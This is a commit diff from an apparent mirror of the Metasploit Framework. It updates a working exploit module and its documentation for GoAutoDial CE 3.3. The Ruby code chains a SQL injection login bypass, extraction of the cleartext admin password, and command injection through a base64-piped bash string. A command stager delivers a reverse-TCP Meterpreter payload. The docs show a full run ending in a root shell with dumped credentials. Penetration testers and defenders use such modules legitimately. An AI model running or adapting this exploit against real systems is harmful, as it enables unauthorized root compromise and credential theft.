infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add command stager and code cleanup

bug/bundler_fix
Brendan Coles 2017-07-02 15:32:48 +00:00 committed by Pearce Barry
parent b3be89b508
commit 8e2ff7a4c5
2 changed files with 110 additions and 89 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
documentation/modules/exploit/linux/goautodial_3_rce_code_injection.md
View File

@ -1,52 +1,51 @@
## Description ## Description
This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database. This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database.
## Affected software ## Affected software
GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html
Refer to: https://www.exploit-db.com/exploits/36807/ Refer to: https://www.exploit-db.com/exploits/36807/
## Verification ## Verification
List the steps needed to make sure this thing works
- Start `msfconsole` - Start `msfconsole`
- Do `use exploit/linux/http/goautodial_3_rce_command_injection` - Do `use exploit/linux/http/goautodial_3_rce_command_injection`
- Do `set payload cmd/unix/reverse_bash`
- Do `set RHOST <IP>` - Do `set RHOST <IP>`
- Do `set LHOST <IP>` - Do `set LHOST <IP>`
- Do `set LPORT <PORT>` - Do `set LPORT <PORT>`
- Do `run`
- Wait for shell - Wait for shell
## Scenarios
``` ```
msf > use exploit/linux/http/goautodial_3_rce_command_injection
msf exploit(goautodial_3_rce_command_injection) > set rhost 172.16.191.150
rhost => 172.16.191.150
msf exploit(goautodial_3_rce_command_injection) > check msf exploit(goautodial_3_rce_command_injection) > check
[+] 192.168.0.76:443 The target is vulnerable. [+] 172.16.191.150:443 The target is vulnerable.
msf exploit(goautodial_3_rce_command_injection) > exploit -z msf exploit(goautodial_3_rce_command_injection) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(goautodial_3_rce_command_injection) > run
[*] Started reverse TCP handler on 192.168.0.11:4444 [*] Started reverse TCP handler on 172.16.191.181:4444
[*] 192.168.0.76:443 - Trying SQL injection... [*] 172.16.191.150:443 - Trying SQL injection...
[+] Authentication Bypass (SQLi) was successful [+] 172.16.191.150:443 - Authentication Bypass (SQLi) was successful
[*] 192.168.0.76:443 - Dumping admin password... [*] 172.16.191.150:443 - Dumping admin password...
[+] admin|goautodial|Admin|||Y [+] 172.16.191.150:443 - Found credentials: admin|goautodial|Admin|||Y
[*] 192.168.0.76:443 - Sending payload...waiting for connection [*] 172.16.191.150:443 - Sending payload...
[*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000 [*] Command Stager progress - 68.67% done (798/1162 bytes)
[*] Session 7 created in the background. [*] Sending stage (2854264 bytes) to 172.16.191.150
msf exploit(goautodial_3_rce_command_injection) > sessions -u 7 [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.150:52876) at 2017-07-02 11:08:02 -0400
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7] [*] Command Stager progress - 100.00% done (1162/1162 bytes)
[*] Upgrading session ID: 7
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.11:4433
[*] Starting the payload handler...
[*] Sending stage (797784 bytes) to 192.168.0.76
[*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(goautodial_3_rce_command_injection) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > getuid meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0 Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo meterpreter > sysinfo
Computer : test Computer : go.goautodial.org
OS : CentOS 5.10 (Linux 2.6.18-371.11.1.el5) OS : CentOS 5.11 (Linux 2.6.18-407.el5)
Architecture : x64 Architecture : x64
Meterpreter : x86/linux Meterpreter : x64/linux
``` ```

144
modules/exploits/linux/http/goautodial_3_rce_command_injection.rb
View File

@ -7,30 +7,38 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => "GoAutoDial 3.3 Authentication Bypass / Command Injection", 'Name' => 'GoAutoDial 3.3 Authentication Bypass / Command Injection',
'Description' => %q{ 'Description' => %q{
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the handler should be setup to receive it appropriately. This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges.
This module has been tested successfully on GoAutoDial version 3.3-1406088000.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Chris McCurley', # Discovery & Metasploit module 'Chris McCurley', # Discovery & Metasploit module
], ],
'References' => 'References' =>
[ [
['CVE', '2015-2843'], ['CVE', '2015-2843'],
['CVE', '2015-2845'] ['CVE', '2015-2845']
], ],
'Platform' => %w{unix}, 'Platform' => 'linux',
'Arch' => ARCH_CMD, 'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' => [ ['Automatic', {} ] ], 'Targets' => [ ['Automatic', {} ] ],
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }, 'DefaultOptions' =>
'DefaultTarget' => 0, {
'Privileged' => false, 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'DisclosureDate' => 'Apr 21 2015')) 'CMDSTAGER::FLAVOR' => 'echo'
},
'CmdStagerFlavor' => %w{ echo printf wget },
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => 'Apr 21 2015'))
register_options( register_options(
[ [
@ -42,100 +50,114 @@ class MetasploitModule < Msf::Exploit::Remote
def check def check
res = check_version() res = check_version
if res and res.body =~ /1421902800/
return Exploit::CheckCode::Safe unless res
else vprint_status "#{peer} Connection failed"
return Exploit::CheckCode::Vulnerable return CheckCode::Unknown
end end
unless res.code == 200 && res.body =~ /goautodial/
return CheckCode::Safe
end
unless res.body =~ /1421902800/
return CheckCode::Vulnerable
end
CheckCode::Safe
end end
def check_version() def check_version
uri = target_uri.path uri = target_uri.path
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'uri' => normalize_uri(uri, 'changelog.txt'),
'uri' => normalize_uri(uri, 'changelog.txt'), 'headers' => {
'headers' => {
'User-Agent' => 'Mozilla/5.0', 'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity' 'Accept-Encoding' => 'identity'
} }
}) })
end end
def sqli_auth_bypass() def sqli_auth_bypass
uri = target_uri.path uri = target_uri.path
send_request_cgi({ send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'), 'uri' => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'),
'headers' => { 'headers' => {
'User-Agent' => 'Mozilla/5.0', 'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity' 'Accept-Encoding' => 'identity'
}, },
'vars_post' => { 'vars_post' => {
'user_name' => 'admin', 'user_name' => 'admin',
'user_pass' => '\'%20or%20\'1\'%3D\'1' 'user_pass' => "' or '"
} }
}) })
end end
def sqli_admin_pass(cookies) def sqli_admin_pass
uri = target_uri.path uri = target_uri.path
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', Rex::Text.uri_encode("' OR active='Y")),
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'), 'cookie' => @cookie,
'headers' => { 'headers' => {
'User-Agent' => 'Mozilla/5.0', 'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity', 'Accept-Encoding' => 'identity'
'Cookie' => cookies
} }
}) })
end end
# #
# Run the actual exploit # Run the command stager
# #
def execute_command() def execute_command(cmd, opts = {})
encoded = Rex::Text.encode_base64("#{payload.encoded}") params = "|echo -n #{Rex::Text.encode_base64(cmd)} |base64 --decode|bash"
params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
uri = target_uri.path uri = target_uri.path
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', Rex::Text.uri_encode(params)),
'uri' => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params), 'cookie' => @cookie,
'headers' => { 'headers' => {
'User-Agent' => 'Mozilla/5.0', 'User-Agent' => 'Mozilla/5.0',
'Accept-Encoding' => 'identity', 'Accept-Encoding' => 'identity'
'Cookie' => @cookie
} }
}) })
end end
def exploit
print_status("#{peer} - Trying SQL injection...")
res = sqli_auth_bypass
def exploit() unless res
print_status("#{rhost}:#{rport} - Trying SQL injection...") fail_with(Failure::Unknown, 'Connection failed')
res1 = sqli_auth_bypass()
if res1 && res1.code == 200
print_good('Authentication Bypass (SQLi) was successful')
else
print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
end end
@cookie = res1.get_cookies if res.code == 200 && res.get_cookies.include?('go_session')
print_status("#{rhost}:#{rport} - Dumping admin password...") print_good("#{peer} - Authentication Bypass (SQLi) was successful")
res = sqli_admin_pass(@cookie)
if res
print_good(res.body)
else else
print_error('Error: No creds returned, possible mitigations are in place.') fail_with(Failure::NotVulnerable, "Run 'check' command to identify whether the auth bypass has been fixed")
end end
print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
execute_command() @cookie = res.get_cookies
print_status("#{peer} - Dumping admin password...")
res = sqli_admin_pass
unless res
fail_with(Failure::Unknown, 'Connection failed')
end
# Example response: admin|goautodial|Admin|||Y
if res.body.include?('|')
print_good("#{peer} - Found credentials: #{res.body}")
else
fail_with(Failure::NotVulnerable, 'No creds returned, possible mitigations are in place.')
end
print_status("#{peer} - Sending payload...")
execute_cmdstager(:linemax => 800)
end end
end end